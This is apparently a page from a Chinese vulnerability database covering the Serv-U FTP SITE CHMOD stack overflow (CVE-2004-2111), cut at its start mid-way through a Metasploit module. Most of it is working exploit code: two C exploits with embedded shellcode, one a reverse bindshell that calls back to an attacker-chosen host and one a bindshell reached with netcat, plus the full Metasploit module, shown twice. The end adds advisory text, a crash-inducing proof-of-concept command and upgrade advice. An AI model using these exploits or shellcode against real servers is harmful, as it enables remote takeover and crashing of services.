					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'BadChars'    => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
					'DisableNops' => true,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 SP0-4 EN', {
						'Ret'    => 0x750212bc, #WS2HELP.DLL
						'Offset' => 396 } ],
					[ 'Windows XP SP0-1 EN', {
						'Ret'    => 0x71aa388f, #WS2HELP.DLL
						'Offset' => 394 } ]
				],
			'DisclosureDate' => 'Dec 31 2004',
			'DefaultTarget'  => 0))
	end

	def check
		connect
		disconnect

		if (banner =~ /Serv-U FTP Server v((4.(0|1))|3.\d)/)
			return Exploit::CheckCode::Vulnerable
		end
			return Exploit::CheckCode::Safe
	end


	def exploit
		connect_login

		eggoptions =
		{
			:checksum => true,
			:eggtag => "W00T"
		}

		hunter,egg = generate_egghunter(payload.encoded,payload_badchars,eggoptions)


		buffer = "chmod 777 "
		buffer <<  make_nops(target['Offset'] - egg.length - hunter.length)
		buffer << egg
		buffer << hunter
		buffer << "\xeb\xc9\x41\x41"	#nseh, jump back to egghunter
		buffer << [target.ret].pack('V')	#seh
		buffer << rand_text(5000)

		print_status("Trying target #{target.name}...")

		send_cmd( ['SITE', buffer] , false)

		handler
		disconnect
	end

end
		

- 漏洞信息 (23591)

RhinoSoft Serv-U FTP Server 3/4 MDTM Command Stack Overflow Vulnerability (1) (EDBID:23591)
windows remote
2004-01-24 Verified
0 mandragore
N/A [点击下载]
source: http://www.securityfocus.com/bid/9483/info

RhinoSoft Serv-U FTP Server is reportedly prone to a buffer overflow. The issue exists when a 'site chmod' command is issued on a non-existant file. If an excessively long filename is specified for the command, an internal buffer will be overrun, resulting in a failure of the FTP server. Execution of arbitrary code may be possible. 

/*
software:       Serv-U 4.1.0.0
vendor:         RhinoSoft, http://www.serv-u.com/
credits:        kkqq <kkqq@0x557.org>, http://www.0x557.org/release/servu.txt
greets:         rosecurity team, int3liban
notes:          should work on any NT, reverse bindshell, terminates the process
author:         mandragore, sploiting@mandragore.solidshells.com
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#include <fcntl.h>
#include <unistd.h>

#define fatal(x) { perror(x); exit(1); }

unsigned char sc[]={
// reverse bindshell, 204 bytes, uses import table
0x33,0xC0,0x04,0xB6,0x68,0xE2,0xFA,0xC3,0xCC,0x68,0x80,0x36,0x96,0x46,0x50,0x68,
0x8B,0x34,0x24,0xB9,0xFF,0xD4,0xF2,0xF1,0x19,0x90,0x96,0x96,0x28,0x6E,0xE5,0xC9,
0x96,0xFE,0xA5,0xA4,0x96,0x96,0xFE,0xE1,0xE5,0xA4,0xC9,0xC2,0x69,0x83,0xE2,0xE2,
0xC9,0x96,0x01,0x0F,0xC4,0xC4,0xC4,0xC4,0xD4,0xC4,0xD4,0xC4,0x7E,0x9D,0x96,0x96,
0x96,0xC1,0xC5,0xD7,0xC5,0xF9,0xF5,0xFD,0xF3,0xE2,0xD7,0x96,0xC1,0x69,0x80,0x69,
0x46,0x05,0xFE,0xE9,0x96,0x96,0x97,0xFE,0x94,0x96,0x96,0xC6,0x1D,0x52,0xFC,0x86,
0xC6,0xC5,0x7E,0x9E,0x96,0x96,0x96,0xF5,0xF9,0xF8,0xF8,0xF3,0xF5,0xE2,0x96,0xC1,
0x69,0x80,0x69,0x46,0xFC,0x86,0xCF,0x1D,0x6A,0xC1,0x95,0x6F,0xC1,0x65,0x3D,0x1D,
0xAA,0xB2,0xC6,0xC6,0xC6,0xFC,0x97,0xC6,0xC6,0x7E,0x92,0x96,0x96,0x96,0xF5,0xFB,
0xF2,0x96,0xC6,0x7E,0x99,0x96,0x96,0x96,0xD5,0xE4,0xF3,0xF7,0xE2,0xF3,0xC6,0xE4,
0xF9,0xF5,0xF3,0xE5,0xE5,0xD7,0x96,0x50,0x91,0xD2,0x51,0xD1,0xBA,0x97,0x97,0x96,
0x96,0x15,0x51,0xAE,0x05,0x3D,0x3D,0x3D,0xF2,0xF1,0x37,0xA6,0x96,0x1D,0xD6,0x9A,
0x1D,0xD6,0x8A,0x1D,0x96,0x69,0xE6,0x9E,0x69,0x80,0x69,0x46
};

char *user="anonymous";
char *pass="not@for.you";
char *path="/incoming";

void usage(char *argv0) {
        printf("usage: %s -d <ip_dest> [options]\n",argv0);
        printf("options:\n");
        printf(" -d target ip\n");
        printf(" -p target port (default 21)\n");
        printf(" -u username to log with (default %s)\n",user);
        printf(" -s password to log with (default %s)\n",pass);
        printf(" -w writable directory (default %s)\n",path);
        printf(" -H listening host (default 127.0.0.1)\n");
        printf(" -P listening port on host (default 80)\n");
        printf("\n");
        exit(1);
}

int main(int argc, char **argv) {
        struct sockaddr_in saddr;
        short port=21;
        int target=0, lhost=0x0100007f;
        int lport=80;
        char *buff;
        int s, ret, i;

        int delta=423;
        int callebx=0x10077A92; // libeay32.dll
        char jmpback[]="\xe9\xff\xfe\xff\xff\xeb\xf9\x90\x90"; // jmp -256
        char chmod[]="SITE CHMOD 777 ";

        printf("[%%]   Serv-u v4.1.0.0 sploit by mandragore\n");

        if (argc<2)
                usage(argv[0]);

        while((i = getopt(argc, argv, "d:p:u:s:w:H:P:"))!= EOF) {
                switch (i) {
                case 'd':
                        target=inet_addr(optarg);
                        break;
                case 'p':
                        port=atoi(optarg);
                        break;
                case 'u':
                        user=optarg;
                        break;
                case 's':
                        pass=optarg;
                        break;
                case 'w':
                        path=optarg;
                        break;
                case 'H':
                        lhost=inet_addr(optarg);
                        break;
                case 'P':
                        lport=atoi(optarg);
                        break;
                default:
                        usage(argv[0]);
                        break;
                }
        }

        if ((target==-1) || (lhost==-1))
                usage(argv[0]);

        printf("[.] if working you'll have a shell on %s:%d.\n", \
                inet_ntoa(*(struct in_addr *)&lhost),lport);
        printf("[.] launching attack on ftp://%s:%s@%s:%d%s\n", \
                user,pass,inet_ntoa(*(struct in_addr *)&target),port,path);

        lport=lport ^ 0x9696;
        lport=(lport & 0xff) << 8 | lport >>8;
        memcpy(sc+0x5a,&lport,2);

        lhost=lhost ^ 0x96969696;
        memcpy(sc+0x53,&lhost,4);

        buff=(char *)malloc(4096);

        saddr.sin_family = AF_INET;
        saddr.sin_addr.s_addr = target;
        saddr.sin_port = htons(port);

        s=socket(2,1,6);

        ret=connect(s,(struct sockaddr *)&saddr, sizeof(saddr));
        if (ret==-1)
                fatal("[-] connect()");

        ret=recv(s,buff,4095,0);
        memset(buff+ret,0,1);
        printf("%s",buff);
        
        sprintf(buff,"USER %s\r\n",user);
        printf("%s",buff);
        send(s,buff,strlen(buff),0);

        ret=recv(s,buff,1024,0);
        memset(buff+ret,0,1);
        printf("%s",buff);
        
        sprintf(buff,"PASS %s\r\n",pass);
        printf("%s",buff);
        send(s,buff,strlen(buff),0);

        ret=recv(s,buff,1024,0);
        memset(buff+ret,0,1);
        printf("%s",buff);

        if (strstr(buff,"230")==0) { 
                printf("[-] bad login/pass combinaison\n"); 
                exit(1); 
        }

        sprintf(buff,"CWD %s\r\n",path);
        printf("%s",buff);
        send(s,buff,strlen(buff),0);

        ret=recv(s,buff,1024,0);
        memset(buff+ret,0,1);
        printf("%s",buff);

        // verify directory
        sprintf(buff,"PWD\r\n",path);
        send(s,buff,strlen(buff),0);
        ret=recv(s,buff,1024,0);
        memset(buff+ret,0,1);
        i=strstr(buff+5,"\x22")-buff-5;
        if (i!=1) i++;  // trailing /

        printf("[+] sending exploit..\n");

        bzero(buff,4096);
        memset(buff,0x90,600);
        strcat(buff,"\r\n");
        delta-=i; // strlen(path);
        memcpy(buff,&chmod,strlen(chmod));
        memcpy(buff+delta-9-strlen(sc),&sc,strlen(sc));
        memcpy(buff+delta-9,&jmpback,5+4);
        memcpy(buff+delta,&callebx,4);

        send(s,buff,602,0);
        
        ret=recv(s,buff,1024,0);
        if ((ret==0) || (ret==-1))
                fatal("[-] ret()");
        memset(buff+ret,0,1);
        printf("%s",buff);

        close(s);

        printf("[+] done.\n");

        exit(0);
}
		

- 漏洞信息 (23592)

RhinoSoft Serv-U FTP Server 3/4 MDTM Command Stack Overflow Vulnerability (2) (EDBID:23592)
windows remote
2004-01-25 Verified
0 mslug@safechina.net
N/A [点击下载]
source: http://www.securityfocus.com/bid/9483/info
 
RhinoSoft Serv-U FTP Server is reportedly prone to a buffer overflow. The issue exists when a 'site chmod' command is issued on a non-existant file. If an excessively long filename is specified for the command, an internal buffer will be overrun, resulting in a failure of the FTP server. Execution of arbitrary code may be possible. 

/*
* serv-u 4.2 site chmod long_file_name stack overflow exp
* vul discovered by kkqq@0x557.org
* exp coded by mslug@safechina.net
* Jan 25 2004
*/

/* test with serv-U 4.1.0.7, 4.1.0.11 on win2k sp4 en machine*/

#include <winsock2.h>
#include <stdio.h>

#define CHMOD_CMD "SITE CHMOD 0666 "
#define ERR_HEADER "550 /"
#define SEH_STACK_POSITION 0x54
#define BUF_STACK_POSITION 0x1ec
#define PADDING_SIZE (BUF_STACK_POSITION - SEH_STACK_POSITION - 
strlen(ERR_HEADER))

// bindshell shellcode from www.cnhonker.org
#define    PORT             53
#define    PORT_OFFSET      176

//0x0A code removed from shellcode
unsigned char bdshellcode[] =
// decode
"\xEB\x10\x5f\x4f\x33\xC9\x66\xB9\x7D\x01\x80\x34\x0f\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
// shellcode
"\x70\x95\x98\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A"
"\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6"
"\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D"
"\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A"
"\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58"
"\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0"
"\x71\x1E\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41"
"\xF3\x9C\xC0\x71\xED\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B"
"\x66\xCE\x75\x12\x41\x5E\x9E\x9B\x99\x99\xAC\xAA\x59\x10\xDE\x9D"
"\xF3\x89\xCE\xCA\x66\xCE\x69\xF3\x98\xCA\x66\xCE\x6D\xC9\xC9\xCA"
"\x66\xCE\x61\x12\x49\x1A\x75\xDD\x12\x6D\xAA\x59\xF3\x89\xC0\x10"
"\x9D\x17\x7B\x62\x10\xCF\xA1\x10\xCF\xA5\x10\xCF\xD9\xFF\x5E\xDF"
"\xB5\x98\x98\x14\xDE\x89\xC9\xCF\xAA\x50\xC8\xC8\xC8\xF3\x98\xC8"
"\xC8\x5E\xDE\xA5\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xC8\x66\xCE\x79"
"\xCB\x66\xCE\x65\xCA\x66\xCE\x65\xC9\x66\xCE\x7D\xAA\x59\x35\x1C"
"\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59"
"\x5A\x71\x76\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD"
"\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC"
"\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xCD\xF1\xEB\xFC\xF8\xFD\x99\xD5"
"\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6"
"\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC\xED\xD8\x99\xFB\xF0"
"\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA\xFA\xFC\xE9\xED"
"\x99\xFA\xF5\xF6\xEA\xFC\xEA\xF6\xFA\xF2\xFC\xED\x99";

//unsigned long jmp_esp = 0x77f4144b;
//unsigned long jmp_ebx = 0x77a5211b;
//unsigned long call_ebx = 0x750219d6; //use this one

unsigned char evil_chmod[5000];
unsigned char seh[] = "\xeb\x06\x90\x90" //jmp below
                     "\xd6\x19\x02\x75" //call_ebx = 0x750219d6
                     "\x33\xc0"         //below: xor eax, eax
                     "\xb0\x1c"         //mov al, 1c
                     "\x03\xd8"         //add ebx, eax
                     "\xc6\x03\x90";    //mov byte ptr [ebx], 90


int main(int argc, char **argv)
{
  WSADATA wsa;
  unsigned short port;
  int ftpsock, ret;
  char recv_buf[1000];
  unsigned long     ip;
  unsigned char buf[100];

  printf("*******************************************\n");
  printf("* Serv-U 4.2 site chmod stack overflow exp*\n");
  printf("* Vul discovered by kkqq@0x557.org        *\n");
  printf("* Coded by mslug@safechina.net            *\n");
  printf("*******************************************\n");
  printf("\n");

  if(argc<6) {
     printf("serv.exe <host> <port> <user> <password> <path>\n");
     return 0;
  }

  WSAStartup(MAKEWORD(2,2), &wsa);

  port = htons(PORT)^(USHORT)0x9999;
  memcpy(&bdshellcode[PORT_OFFSET], &port, 2);


  ftpsock = connect_tcp(argv[1], atoi(argv[2]));
  if(ftpsock < 0) {
     printf("[-] Connection refused\n");
     return 0;
  }
  ret = recv(ftpsock, recv_buf, sizeof(recv_buf), 0);

  recv_buf[ret] = 0;
  printf("%s", recv_buf);


  sprintf(buf, "USER %s\r\n", argv[3]);
  send(ftpsock, buf, strlen(buf), 0);

  ret = recv(ftpsock, recv_buf, sizeof(recv_buf), 0);

  recv_buf[ret] = 0;
  printf("%s", recv_buf);

  sprintf(buf, "PASS %s\r\n", argv[4]);
  send(ftpsock, buf, strlen(buf), 0);

  ret = recv(ftpsock, recv_buf, sizeof(recv_buf), 0);
  recv_buf[ret] = 0;
  printf("%s", recv_buf);

  sprintf(buf, "CWD %s\r\n", argv[5]);
  send(ftpsock, buf, strlen(buf), 0);

  ret = recv(ftpsock, recv_buf, sizeof(recv_buf), 0);
  recv_buf[ret] = 0;
  printf("%s", recv_buf);

  memset(evil_chmod, 0x90, sizeof(evil_chmod));
  memcpy(evil_chmod, CHMOD_CMD, strlen(CHMOD_CMD));
  memcpy(&evil_chmod[strlen(CHMOD_CMD)+PADDING_SIZE], seh, strlen(seh));
  memcpy(&evil_chmod[strlen(CHMOD_CMD)+PADDING_SIZE+strlen(seh)+20], 
bdshellcode, strlen(bdshellcode));

  send(ftpsock, evil_chmod, strlen(evil_chmod), 0);

  printf("[+] Shellcode sent\n");
  printf("[+] Now nc to port 53\n");

  closesocket(ftpsock);
  WSACleanup();

  return 0;
}

int connect_tcp(char *host, int port)
{
  struct hostent *rhost;
  struct sockaddr_in sin_rhost;
  unsigned long ip_rhost;
  int sock;

  memset(&sin_rhost, 0, sizeof(sin_rhost));

  sin_rhost.sin_family = AF_INET;
  sin_rhost.sin_port = htons(port);
  ip_rhost = inet_addr(host);
  if(ip_rhost==INADDR_NONE) {
     rhost = gethostbyname(host);
     if(rhost==0) return -1;
     ip_rhost = *(unsigned long*)rhost->h_addr;
  }

  sin_rhost.sin_addr.s_addr = ip_rhost;

  sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  if(sock<0) {
     return -1;
  }

  if(connect(sock, (struct sockaddr*) &sin_rhost, sizeof(sin_rhost))) {
     return -1;
  }

  return sock;
}
		

- 漏洞信息 (F107462)

Serv-U FTP Server Buffer Overflow (PacketStormID:F107462)
2011-12-02 00:00:00
The Light Cosine  metasploit.com
exploit,overflow
CVE-2004-2111
[点击下载]

This Metasploit module exploits a stack buffer overflow in the site chmod command in versions of Serv-U FTP Server prior to 4.2. You must have valid credentials to trigger this vulnerability. Exploitation also leaves the service in a non-functional state.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::Egghunter
	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Serv-U FTP Server <4.2 Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack buffer overflow in the site chmod command
				in versions of Serv-U FTP Server prior to 4.2.

				You must have valid credentials to trigger this vulnerability. Exploitation
				also leaves the service in a non-functional state.
			},
			'Author'         => 'thelightcosine <thelightcosine[at]metasploit.com>',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2004-2111'],
					[ 'BID', '9483'],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'BadChars'    => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
					'DisableNops' => true,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 SP0-4 EN', {
						'Ret'    => 0x750212bc, #WS2HELP.DLL
						'Offset' => 396 } ],
					[ 'Windows XP SP0-1 EN', {
						'Ret'    => 0x71aa388f, #WS2HELP.DLL
						'Offset' => 394 } ]
				],
			'DisclosureDate' => 'Dec 31 2004',
			'DefaultTarget'  => 0))
	end

	def check
		connect
		disconnect

		if (banner =~ /Serv-U FTP Server v((4.(0|1))|3.\d)/)
			return Exploit::CheckCode::Vulnerable
		end
			return Exploit::CheckCode::Safe
	end


	def exploit
		connect_login

		eggoptions =
		{
			:checksum => true,
			:eggtag => "W00T"
		}

		hunter,egg = generate_egghunter(payload.encoded,payload_badchars,eggoptions)


		buffer = "chmod 777 "
		buffer <<  make_nops(target['Offset'] - egg.length - hunter.length)
		buffer << egg
		buffer << hunter
		buffer << "\xeb\xc9\x41\x41"	#nseh, jump back to egghunter
		buffer << [target.ret].pack('V')	#seh
		buffer << rand_text(5000)

		print_status("Trying target #{target.name}...")

		send_cmd( ['SITE', buffer] , false)

		handler
		disconnect
	end

end
    

- 漏洞信息

3713
Serv-U FTP Server SITE CHMOD Command Filename Handling Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public, Exploit Commercial Vendor Verified

- 漏洞描述

- 时间线

2004-01-24 Unknow
2004-01-27 2004-01-24

- 解决方案

Upgrade to version 5.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

RhinoSoft Serv-U FTP Server SITE CHMOD Buffer Overflow Vulnerability
Boundary Condition Error 9675
Yes No
2004-02-16 12:00:00 2007-11-15 12:37:00
Discovery of this issue is credited to Some Guy <maillist@bastart.eu.org>. This issue may also have been independently discovered by kkqq <kkqq@0x557.org>.

- 受影响的程序版本

Rhino Software Serv-U 5.0 .0.4
Rhino Software Serv-U 4.1 .0.11
Rhino Software Serv-U 4.1
Rhino Software Serv-U 4.0 .0.4
Rhino Software Serv-U 3.1

- 漏洞讨论

RhinoSoft Serv-U FTP Server is prone to a remote post-authentication buffer-overflow vulnerability.

The vulnerability occurs when a malicious filename argument is passed to the SITE CHMOD command. The immediate consequences of this issue may be a denial of service. An attacker may be able to leverage this condition to execute arbitrary code in the context of the affected service, but this has not been confirmed.

- 漏洞利用

The following proof-of-concept example will reportedly cause a server crash:

SITE CHMOD 666 \\...\UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

The following exploit code has been supplied:

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站